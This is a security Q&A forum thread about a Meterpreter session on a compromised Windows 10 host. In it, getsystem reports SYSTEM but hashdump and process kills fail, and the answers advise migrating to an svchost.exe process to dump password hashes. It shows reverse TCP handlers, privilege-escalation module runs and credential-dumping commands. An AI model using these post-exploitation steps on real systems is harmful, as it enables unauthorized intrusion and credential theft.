9

I am facing a very weird issue. I have successfully popped a box using Shellter with Meterpreter_Reverse TCP.

Here is the sysinfo :

meterpreter > sysinfo
Computer        : ********
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows

Now the weird thing is when I type : 

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

It says that I have get the NT Authority, however when I type :

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeDebugPrivilege
  SeImpersonatePrivilege
  SeSystemProfilePrivilege
  SeTcbPrivilege

These are just the priviledges that I get. Not all. If I try to use hashdump :

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Also, I have already migrated to another NT Authority Process, in this case ( svchost.exe )

If I try to run any background local exploit it says that the system is already elevated. 

msf exploit(ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[-] Exploit aborted due to failure: none: Session is already elevated

Also, if I try to use the "ASK" exploit to gain priviledge, this is what happens :

msf exploit(ask) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[+] UAC is not enabled, no prompt for the user
[*] Uploading eobKMikmOsnWp.exe - 73802 bytes to the filesystem...
[*] Executing Command!

And it just freezes, and no prompt is given on the victims computer.

Also any command I try to run, it just gives me an error stating that I don't have access:

meterpreter > kill 7744
Killing: 7744
[-] stdapi_sys_process_kill: Operation failed: Access is denied.

I am totally lost to understand what exactly is happening here? It says that I have gained the access of the system, but still I am not able to do anything?

Why?

Any help would be appreciated.

Sankalp Singha
  • 301
  • 1
  • 3
  • 6
  • 1
    Quite strange... my list of privileges once eleveated over a "meterpreted" w10 is larger. Anyway, I have same result on `hashdump`, same output. Maybe something changed on Windows on an update and the script is not updated, IDK. – OscarAkaElvis Jul 09 '17 at 21:51
  • Yeah, but I want to know if there is a fix for this? I have no clue why the hell is this hapenning :/ – Sankalp Singha Jul 10 '17 at 07:26
  • I have experienced similar issues, while I haven't investigated the root cause I have been able to work around it simply by migrating to a different process. – wireghoul Jul 14 '17 at 02:26

2 Answers2

1

Is the target using EMET? Specifically, the application whitelisting? Also, any sort of AV?

Also, maybe it's because you didn't set the session, which both hashdump and getsystem rely on. It might also stop you from getting an interactive shell!:

https://www.offensive-security.com/metasploit-unleashed/john-ripper/ https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

Last, can you use a payload other than meterpreter (e.g. generated via msfvenom) instead?

grepNstepN
  • 610
  • 4
  • 15
1

As the OP states, I received the same error/output after initially escalating privs to system.

meterpreter > hashdump 
[-] 2007: Operation failed: The parameter is incorrect.

I remembered that during the exploit there was output saying that notepad was being used to kick it off. So I ran getpid and ps to see what my current process was.

Turned out I was still running as notepad.exe. I decided to try the migrate tool within meterpreter and move to an svchost.exe process. ex migrate 500 ..

After migration completed successfully I was able to run hashdump as usual.

schroeder
  • 123,438
  • 55
  • 284
  • 319
snyd0g
  • 11
  • 1